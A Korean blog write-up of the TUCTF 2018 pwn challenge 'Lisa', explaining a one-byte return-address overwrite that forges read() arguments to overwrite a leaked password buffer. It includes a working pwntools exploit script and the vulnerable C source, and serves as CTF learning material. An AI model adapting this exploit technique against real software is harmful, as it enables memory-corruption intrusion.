Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 |
Tags
- Leak
- TUCTF
- FSB
- pwnable.kr
- 2018
- CANARY
- PMA
- Read
- Rookiss
- writeup
- Toddler's Bottle
- picoCTF
- CTF
- reversing
- pwnable
- Bottle
- pico
- rev
- Bug
- practicalmalwareanalysis
- shellcraft
- anti
- shellcode
- toddler
- string
- pwn
- BOF
- format
- ASM
- Reverse
Archives
- Today
- Total
제리의 블로그
TUCTF 2018 PWN Lisa 본문
TUCTF 2018 PWN Lisa
요약
1-byte overflow(?) 문제이다.
RET 를 1-byte 만 변조할 수 있다.
strcmp(input, password); 를 만족하면 FLAG 가 주어지는 방식인데
input 은 사용자의 입력을 받는 부분이고
password(share) 는 우리가 알 수 없는 값이다.
RET 를 main+0xD5 로 덮어주면
read 함수를 실행하기 바로 직전이 되는데
32 bit 바이너리의 cdecl 함수 호출 규약에 따라
스택 영역에 fd, buf, nbytes 를
공격자의 입맛대로 넣어주기만 하면
원하는 공간에 덮을 수 있다.
password 의 주소는 바이너리에서 친절하게 주어졌기 때문에
password 를 덮어씌워
input 값과 똑같이만 만들면 된다.
from pwn import *
r = process('./lisa')
r.recvuntil(': ')
share = int(r.recvline(), 16)
log.success(hex(share))
r.recvuntil('.\n')
payload = ''
payload += p32(0) # fd
payload += p32(share) # buf
payload += p32(1) # nbytes
r.send(payload)
r.recvline()
payload = ''
payload += '\0' * 0x1C
payload += '\x15' # 0x56???D15 (main+0xD5)
r.send(payload)
r.send('\0')
r.interactive()
// gcc -o lisa lisa.c -m32 -mpreferred-stack-boundary=2
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
char *inp, *pass;
int pfd;
void lisa();
void fail(void *buf)
{
puts("Ugh! You kiss your mother with that mouth?");
read(0, buf, 0x1Du);
return;
}
int doStrcmp(char *s1, char *s2)
{
return strcmp(s1, s2) == 0;
}
void checkPass()
{
char buf[0x18]; // [sp+0h] [bp-18h]@3
if ( doStrcmp(inp, pass) )
lisa();
else
fail(buf);
return;
}
void lisa()
{
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>''''''<!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''''` ``'!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!''` ..... `'!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!'` . :::::' `'!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!' . ' .::::' `!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!' : ````` `!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!! .,cchcccccc,,. `!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!! .-\"?$$$$$$$$$$$$$$c, `!!!!!!!!!!!");
puts("!!!!!!!!!!!!!! ,ccc$$$$$$$$$$$$$$$$$$$, `!!!!!!!!!!");
puts("!!!!!!!!!!!!! z$$$$$$$$$$$$$$$$$$$$$$$$;. `!!!!!!!!!");
puts("!!!!!!!!!!!! <$$$$$$$$$$$$$$$$$$$$$$$$$$:. `!!!!!!!!");
puts("!!!!!!!!!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$h;:. !!!!!!!!");
puts("!!!!!!!!!!' $$$$$$$$$$$$$$$$$$$$$$$$$$$$$h;. !!!!!!!");
puts("!!!!!!!!!' <$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ !!!!!!!");
puts("!!!!!!!!' `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F `!!!!!!");
puts("!!!!!!!! c$$$$???$$$$$$$P\"\" \"\"\"??????\" !!!!!!");
puts("!!!!!!! `\"\" .,.. \"$$$$F .,zcr !!!!!!");
printf("\t\t\t\t");
system("/bin/cat ./flag");
puts("!!!!!!!! <. $$c= <$d$$$ <$$$$=-=+\"$$$$$$$ !!!!!!");
puts("!!!!!!! d$$$hcccd$$$$$ d$$$hcccd$$$$$$$F `!!!!!");
puts("!!!!!! ,$$$$$$$$$$$$$$h d$$$$$$$$$$$$$$$$ `!!!!!");
puts("!!!!! `$$$$$$$$$$$$$$$<$$$$$$$$$$$$$$$$' !!!!!");
puts("!!!!! `$$$$$$$$$$$$$$$$\"$$$$$$$$$$$$$P> !!!!!");
puts("!!!!! ?$$$$$$$$$$$$??$c`$$$$$$$$$$$?>' `!!!!");
puts("!!!!! `?$$$$$$I7?\"\" ,$$$$$$$$$?>>' !!!!");
puts("!!!!!. <<?$$$$$$c. ,d$$?$$$$$F>>'' `!!!");
puts("!!!!!! <i?$P\"??$$r--\"?\"\" ,$$$$h;>'' `!!!");
puts("!!!!!! $$$hccccccccc= cc$$$$$$$>>' !!!");
puts("!!!!! `?$$$$$$F\"\"\"\" `\"$$$$$>>>'' `!!");
puts("!!!!! \"?$$$$$cccccc$$$$??>>>>' !!");
puts("!!!!> \"$$$$$$$$$$$$$F>>>>'' `!");
puts("!!!!! \"$$$$$$$$???>''' !");
puts("!!!!!> `\"\"\"\"\" `");
puts("!!!!!!; . `");
puts("!!!!!!! ?h.");
puts("!!!!!!!! $$c,");
puts("!!!!!!!!> ?$$$h. .,c");
puts("!!!!!!!!! $$$$$$$$$hc,.,,cc$$$$$");
puts("!!!!!!!!! .,zcc$$$$$$$$$$$$$$$$$$$$$$");
puts("!!!!!!!!! .z$$$$$$$$$$$$$$$$$$$$$$$$$$$$");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ .");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ !!");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ,!'");
puts("!!!!!!!!> c$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$. !'");
puts("!!!!!!'' ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> '");
puts("!!!'' z$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$>");
puts("!' ,$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> ..");
puts(" z$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$' ;!!!!''`");
puts(" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F ,;;!'`' .''");
puts(" <$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> ,;'`' ,;");
puts(" `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F -' ,;!!'");
puts(" \"?$$$$$$$$$$?$$$$$$$$$$$$$$$$$$$$$$$$$$F .<!!!''' <!");
puts(" !> \"\"??$$$?C3$$$$$$$$$$$$$$$$$$$$$$$$\"\" ;!''' !!!");
puts(" ;!!!!;, `\"''\"\"????$$$$$$$$$$$$$$$$\"\" ,;-'' ',!");
puts(" ;!!!!<!!!; . `\"\"\"\"\"\"\"\"\"\"\" `' ' '");
puts(" !!!! ;!!! ;!!!!>;,;, .. ' . ' '");
puts(" !!' ,;!!! ;'`!!!!!!!!;!!!!!; . >' .'' ;");
puts(" !!' ;!!'!';! !! !!!!!!!!!!!!! ' -'");
puts(" <!! !! `!;! `!' !!!!!!!!!!<! .");
puts(" `! ;! ;!!! <' <!!!! `!!! < /");
puts(" `; !> <!! ;' !!!!' !!';! ;'");
puts(" ! ! !!! ! `!!! ;!! ! ' '");
puts(" ; `! `!! ,' !' ;!'");
puts(" ' /`! ! < !! < '");
puts(" / ;! >;! ;>");
puts(" !' ; !! '");
puts(" ' ;! > ! '");
puts(" '");
return;
}
int main()
{
char s[0x30]; // [sp+0h] [bp-34h]@1
setvbuf(stdout, NULL, _IONBF, 0x14u);
setvbuf(stdin, NULL, _IONBF, 0x14u);
memset(&s, 0, 0x30u);
pass = malloc(0x2Bu);
printf("Here's your share: %p\n", pass);
puts("What? The Mona Lisa!\nLook, if you want somethin' from me, I'm gonna need somethin' from you alright...");
read(0, s, 0x30u);
inp = s;
pfd = open("./password", 0);
read(pfd, pass, 0x2Bu);
checkPass();
return 0;
}
'CTF > pwnable' 카테고리의 다른 글
| RTL - Warmup - hayyim CTF 2022 Writeup (0) | 2022.02.14 |
|---|---|
| sdhsroot 2018 PWN R00T_SCHool (0) | 2018.12.26 |
| TUCTF 2018 PWN Timber (0) | 2018.11.27 |
| TUCTF 2018 PWN shella-hard (0) | 2018.11.27 |
| TUCTF 2018 PWN Canary (0) | 2018.11.26 |
'CTF/pwnable' Related Articles
more
Comments